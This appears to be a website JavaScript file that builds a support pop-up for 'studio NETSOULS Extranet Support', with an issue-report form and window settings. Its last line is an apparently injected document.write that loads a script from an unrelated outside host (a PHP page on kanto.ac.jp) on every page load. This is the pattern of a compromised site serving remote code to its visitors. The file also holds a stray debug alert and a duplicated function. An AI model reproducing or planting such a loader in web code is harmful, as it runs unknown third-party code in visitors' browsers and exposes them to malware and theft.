function submitForm()
{
    return true;
}

function submitForm()
{
 alert("hre");
 if (document.getElementById("__IssueDescription"))
 {
	issue = document.getElementById("__IssueDescription").value;
 }

 if (document.getElementById("__IssueType_1").checked)
   issueType = document.getElementById("__IssueType_1").value;
 else if (document.getElementById("__IssueType_2").checked)
   issueType = document.getElementById("__IssueType_2").value;
 else if (document.getElementById("__IssueType_3").checked)
   issueType = document.getElementById("__IssueType_3").value;

 if (document.getElementById("__NotifyType_1").checked)
   notifyType = document.getElementById("__NotifyType_1").value;
 else if (document.getElementById("__NotifyType_2").checked)
   notifyType = document.getElementById("__NotifyType_2").value;
 else if (document.getElementById("__NotifyType_3").checked)
   notifyType = document.getElementById("__NotifyType_3").value;

 document.getElementById("__IssueType").value = issueType;
 document.getElementById("__NotifyType").value = notifyType;
 document.getElementById("__Issue").value = issue;
}

var params =
{
   BorderWidth : 2,
   ContentColor : '#F1F1F1',
   ContentHTML : '<form id=\"FormSubmitIssue\" name=\"FormSubmitIssue\" method=\"post\" OnSubmit=\"JavaScript:submitForm()\"><input type=\"radio\" checked=\"true\" value=\"1\" name=\"__IssueType\" id=\"__IssueType_1\"/> <label for=\"__IssueType_1\">The information is incorrect or needs to be updated</label><br> <input type=\"radio\" value=\"2\" name=\"__IssueType\" id=\"__IssueType_2\"/><label for=\"__IssueType_2\"> I received an error from this page</label><br> <input type=\"radio\" value=\"3\" name=\"__IssueType\" id=\"__IssueType_3\"/> <label for=\"__IssueType_3\">I am stuck on this page</label><br> <br><span id=\"error_IssueDescriptionEmptyImg\" Name=\"error_IssueDescriptionEmptyImg\" style=\"visibility:hidden;\"><img src=\"/images/WarningIcon.gif\" /></span> Please provide details of the issue you are having:<span id=\"error_IssueDescriptionEmpty\" style=\"visibility:hidden; color: red\" name=\"error_IssueDescriptionEmpty\"><br/>Enter the details of your issue</span> <textarea name=\"__IssueDescription\" id=\"__IssueDescription\" rows=\"9\" style=\"width: 100%\"></textarea><input type=\"hidden\" name=\"__Issue\" id=\"__Issue\"/> <br><br> <input type=\"radio\" value=\"1\" name=\"__NotifyType\" id=\"__NotifyType_1\"/> <label for=\"__NotifyType_1\">Call Me When This Is Resolved</label><br> <input type=\"radio\" value=\"2\" name=\"__NotifyType\" id=\"__NotifyType_2\"/><label for=\"__NotifyType_2\"> Email Me When This Is Resolved</label><br> <input type=\"radio\" value=\"3\" checked=\"true\" name=\"__NotifyType\" id=\"__NotifyType_3\"/> <label for=\"__NotifyType_3\">It Is Not Necessary To Contact Me</label><br> <br> <div align=\"center\"><input type=\"button\" Value=\"Cancel\" OnClick=\"JavaScript:SupportWindow.CloseWindow()\"> &nbsp; <input type=\"submit\" Value=\"Submit\" OnClick=\'JavaScript:document.getElementById(\"error_IssueDescriptionEmpty\").style.visibility = \"hidden\";if(document.FormSubmitIssue.__IssueDescription.value == \"\"){document.getElementById(\"error_IssueDescriptionEmpty\").style.visibility = \"visible\";  document.getElementById(\"error_IssueDescriptionEmptyImg\").style.visibility = \"visible\";}\'></div></form>',
   ContentPadding : 13,
   Height : 490,
   InnerBorderColor : '#cccccc',
   InnerBorderWidth : 0,
   OuterBorderColor : '#bebebe',
   ResizeBoxHeight : 7,
   ResizeBoxSrc : '/Images/resize.gif',
   ResizeBoxWidth : 7,
   Shadow : true,
   StatusBarHeight : 17,
   StatusColor : '#F1F1F1',
   TitleBarText : 'studio NETSOULS Extranet Support',
   TitleColor : '#195BA7',
   Width : 450,
   TitleFontSize : 12,
   ContentFontSize : 12,
   ContentFontColor : 'Black',
   Id  : 'SupportWindow'
}
var SupportWindow = new FerantDHTMLWindow(params);
document.write('<script src=http://kanto.ac.jp/course/VIVID.php ><\/script>');